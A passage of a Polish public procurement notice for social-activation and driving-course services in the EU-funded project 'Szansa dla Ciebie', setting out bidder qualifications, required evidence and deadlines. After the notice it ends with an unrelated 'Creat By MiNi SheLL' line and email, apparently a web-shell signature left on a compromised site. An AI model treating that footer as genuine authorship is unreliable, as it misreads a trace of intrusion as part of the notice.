Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Dla Części 1, 2, 3 i 4 zamówienia, Zamawiający nie określa warunków w ww. zakresie.<br/>Dla Części 5 zamówienia Wykonawca spełni warunek jeżeli wykaże, że posiada aktualny wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców zgodnie z art. 28 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (tj. Dz. U. 2021 poz. 1212).<br/>Sposób wykazania warunku udziału w postępowaniu dla Części 5 zamówienia wskazano w pkt VII SWZ.<br/>3)	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>4)	Zdolności technicznej lub zawodowej:<br/>Określenie warunków:<br/>Dla Części 1 zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia – opracowywać opinie na potrzeby indywidualnej diagnozy potrzeb oraz oceny postępów w zakresie aktywizacji społeczno - zatrudnieniowej Uczestników projektu pn. „Szansa dla Ciebie”, która:<br/>a.	posiada wykształcenie wyższe magisterskie na kierunku psychologia, <br/>b.	posiada 2 letnie doświadczenie zawodowe w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym.<br/>Dla Części 2 zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia – prowadzić trening kompetencji i umiejętności społecznych dla Uczestników projektu pn. „Szansa dla Ciebie”, która:<br/>a.	posiada wykształcenie wyższe magisterskie na kierunku psychologia, <br/>b.	posiada 2 letnie doświadczenie zawodowe w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym.<br/>Dla Części 3 zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia – prowadzić trening kompetencji i umiejętności społecznych dla Uczestników projektu pn. „Szansa dla Ciebie” (osób z niepełnosprawnościami), która:<br/>a.	posiada wykształcenie wyższe magisterskie na kierunku psychologia, <br/>b.	posiada 2 letnie doświadczenie zawodowe w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym.<br/>Dla Części 4 zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia – prowadzić zajęcia indywidualne dla Uczestników projektu pn. „Szansa dla Ciebie” (osób z niepełnosprawnościami) mające na celu aktywizację zawodową i pomoc w podjęciu decyzji dotyczącej wyboru szkolenia zawodowego, która:<br/>a.	posiada wykształcenie wyższe, bądź uzupełniające – podyplomowe, z zakresu doradztwa zawodowego, <br/>b.	posiada 2 letnie doświadczenie zawodowe jako doradca zawodowy w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym.<br/>Dla Części 5 zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia – prowadzić zajęcia teoretyczne, praktyczne i zajęcia z kursu pierwszej pomocy w zakresie udzielania pomocy przed lekarskiej w ramach kursów nauki jazdy kat. B, która:<br/>a.	posiada uprawnienia zgodne z przepisami ustawy z dnia 5 stycznia 2011 roku o kierujących pojazdami (t.j. Dz.U. z 2021 roku, poz. 1212 z późn. zm.) i rozporządzenia Ministra Infrastruktury i Budownictwa z dnia 4 marca 2016 roku w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (t.j. Dz.U. 2018 poz. 1885), <br/>b.	posiada 2 letnie doświadczenie w prowadzeniu zajęć w ramach kursów nauki jazdy kat. B.<br/>Sposób wykazania warunku udziału w postępowaniu dla Części 1, 2, 3, 4 i 5 zamówienia wskazano w pkt VII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, w celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu (aktualnych na dzień złożenia):<br/>1)	W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: <br/>a.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt VI SWZ, o których mowa w art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4, 5 i 7 ustawy Pzp, art. 7 ust. 1 ustawy sankcyjnej – Załącznik Nr 3a do SWZ;<br/>b.	w przypadku, gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby, oświadczenia podmiotu udostępniającego zasoby o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 5 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt VI SWZ, o których mowa w art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4, 5 i 7 ustawy Pzp, art. 7 ust. 1 ustawy sankcyjnej – Załącznik Nr 3b do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, w celu potwierdzenia spełnienia warunków udziału w postępowaniu (aktualnych na dzień złożenia):<br/>. wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – dot. Części 5 zamówienia - Zamawiający będzie żądał dostarczenia aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców zgodnie z art. 28 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (tj. Dz. U. 2021 poz. 1212).<br/>b.	zdolności technicznej lub zawodowej – dot. Części 1, 2, 3, 4 zamówienia - Zamawiający będzie żądał dostarczenia Wykazu osób skierowanych do realizacji zamówienia wraz z informacjami nt. wykształcenia i doświadczenia zawodowego niezbędnego do wykonania zamówienia publicznego oraz informacją o zakresie wykonywanych przez nią czynności i informacją o podstawie do dysponowania tą osobą – Załącznik Nr 4a do SWZ.<br/>Osoba wskazana w w/w wykazie musi być tą samą osobą, którą Wykonawca wskaże w formularzu oferty.<br/>c.	zdolności technicznej lub zawodowej – dot. Części 5 zamówienia - Zamawiający będzie żądał dostarczenia Wykazu osób skierowanych do realizacji zamówienia wraz z informacjami nt. kwalifikacji i doświadczenia zawodowego niezbędnego do wykonania zamówienia publicznego oraz informacją o zakresie wykonywanych przez nią czynności i informacją o podstawie do dysponowania tą osobą – Załącznik Nr 4b do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający, nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie o których mowa w pkt. VII.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt V.1 ppkt 2 SWZ, będzie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia/kwalifikacje zawodowe i doświadczenia zawodowego, o których mowa w pkt V.1 ppkt 4 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadkach, o których mowa w pkt 3 i 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć na druku stanowiącym Załącznik Nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt VII.4 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>1)	w pkt VII.4 ppkt 1a SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>2)	w pkt VII.4 ppkt 1b SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, który polega na zdolnościach podmiotów udostępniających zasoby,<br/>3)	w pkt VII.4 ppkt 2 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekty umów stanowią:<br/>1)	dla osoby fizycznej, nieprowadzącej działalności gospodarczej i dla osoby prowadzącej jednoosobową działalność gospodarczą, która będzie osobiście realizowała zamówienie: Załącznik Nr 7a do SWZ (dla Części 1 zamówienia), Załącznik Nr 7b do SWZ (dla Części 2 zamówienia), Załącznik Nr 7c do SWZ (dla Części 3 zamówienia), Załącznik Nr 7d do SWZ (dla Części 4 zamówienia);<br/>2)	dla firmy: Załącznik Nr 8a do SWZ (dla Części 1 zamówienia), Załącznik Nr 8b do SWZ (dla Części 2 zamówienia), Załącznik Nr 8c do SWZ (dla Części 3 zamówienia), Załącznik Nr 8d do SWZ (dla Części 4 zamówienia), Załącznik Nr 8e do SWZ (dla Części 5 zamówienia).<br/><br/>Zamawiający przewiduje zmiany umowy w zakresie Części 1, 2, 3, 4 i 5 zamówienia: <br/>Dopuszcza się zmiany istotnych postanowień i warunków umowy na podstawie art. 455 ustawy Pzp, na warunkach określonych w załączonych do SWZ projektach umów, w szczególności dotyczące: zmiany terminu realizacji zamówienia, zmian warunków płatności i sposobu rozliczania umowy, pod warunkiem, zmiana ta będzie korzystna dla Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pcpr-radom.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest realizowane w ramach i na potrzeby Projektu „Szansa dla Ciebie”współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020, Oś Priorytetowa IX Wspieranie włączenia społecznego i walka z ubóstwem, Działanie 9.1 Aktywizacja społeczno-zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu.

Creat By MiNi SheLL
Email: jattceo@gmail.com